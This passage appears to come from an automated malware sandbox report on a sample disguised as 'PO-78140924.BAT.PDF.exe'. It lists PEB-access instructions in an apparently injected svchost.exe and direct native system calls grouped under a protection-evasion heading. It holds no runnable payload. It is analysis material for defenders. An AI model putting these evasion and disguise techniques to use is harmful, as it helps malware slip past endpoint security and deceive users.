            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37152 mov eax, dword ptr fs:[00000030h]2_2_03C37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC9179 mov eax, dword ptr fs:[00000030h]2_2_03CC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C31131 mov eax, dword ptr fs:[00000030h]2_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C31131 mov eax, dword ptr fs:[00000030h]2_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D050D9 mov eax, dword ptr fs:[00000030h]2_2_03D050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03CAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03CAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C590DB mov eax, dword ptr fs:[00000030h]2_2_03C590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C550E4 mov eax, dword ptr fs:[00000030h]2_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C550E4 mov ecx, dword ptr fs:[00000030h]2_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D08D mov eax, dword ptr fs:[00000030h]2_2_03C2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35096 mov eax, dword ptr fs:[00000030h]2_2_03C35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D090 mov eax, dword ptr fs:[00000030h]2_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D090 mov eax, dword ptr fs:[00000030h]2_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6909C mov eax, dword ptr fs:[00000030h]2_2_03C6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov ebx, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov eax, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B052 mov eax, dword ptr fs:[00000030h]2_2_03C5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB106E mov eax, dword ptr fs:[00000030h]2_2_03CB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05060 mov eax, dword ptr fs:[00000030h]2_2_03D05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov ecx, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD070 mov ecx, dword ptr fs:[00000030h]2_2_03CAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h] | 2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3D7E0 mov ecx, dword ptr fs:[00000030h] | 2_2_03C3D7E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h] | 2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h] | 2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEF78A mov eax, dword ptr fs:[00000030h] | 2_2_03CEF78A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB97A9 mov eax, dword ptr fs:[00000030h] | 2_2_03CB97A9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h] | 2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D037B6 mov eax, dword ptr fs:[00000030h] | 2_2_03D037B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h] | 2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5D7B0 mov eax, dword ptr fs:[00000030h] | 2_2_03C5D7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h] | 2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h] | 2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h] | 2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h] | 2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h] | 2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h] | 2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D03749 mov eax, dword ptr fs:[00000030h] | 2_2_03D03749
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h] | 2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h] | 2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h] | 2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h] | 2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C37703 mov eax, dword ptr fs:[00000030h] | 2_2_03C37703
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C35702 mov eax, dword ptr fs:[00000030h] | 2_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h] | 2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h] | 2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6F71F mov eax, dword ptr fs:[00000030h] | 2_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEF72E mov eax, dword ptr fs:[00000030h] | 2_2_03CEF72E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C33720 mov eax, dword ptr fs:[00000030h] | 2_2_03C33720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h] | 2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF972B mov eax, dword ptr fs:[00000030h] | 2_2_03CF972B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h] | 2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C29730 mov eax, dword ptr fs:[00000030h] | 2_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C65734 mov eax, dword ptr fs:[00000030h] | 2_2_03C65734
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3973A mov eax, dword ptr fs:[00000030h] | 2_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h] | 2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h] | 2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h] | 2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h] | 2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h] | 2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h] | 2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEF6C7 mov eax, dword ptr fs:[00000030h] | 2_2_03CEF6C7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C616CF mov eax, dword ptr fs:[00000030h] | 2_2_03C616CF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h] | 2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5D6E0 mov eax, dword ptr fs:[00000030h] | 2_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C636EF mov eax, dword ptr fs:[00000030h] | 2_2_03C636EF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h] | 2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CED6F0 mov eax, dword ptr fs:[00000030h] | 2_2_03CED6F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h] | 2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h] | 2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2D6AA mov eax, dword ptr fs:[00000030h] | 2_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h] | 2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h] | 2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h] | 2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h] | 2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h] | 2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C69660 mov eax, dword ptr fs:[00000030h] | 2_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h] | 2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C61607 mov eax, dword ptr fs:[00000030h] | 2_2_03C61607
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6F603 mov eax, dword ptr fs:[00000030h] | 2_2_03C6F603
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h] | 2_2_03C4260B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_0004997C GetProcessHeap,RtlAllocateHeap,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock | 0_2_0004997C
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_0003A2A4 SetUnhandledExceptionFilter | 0_2_0003A2A4
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_0003A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0003A2D5

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtCreateMutant: Direct from: 0x76EF35CC
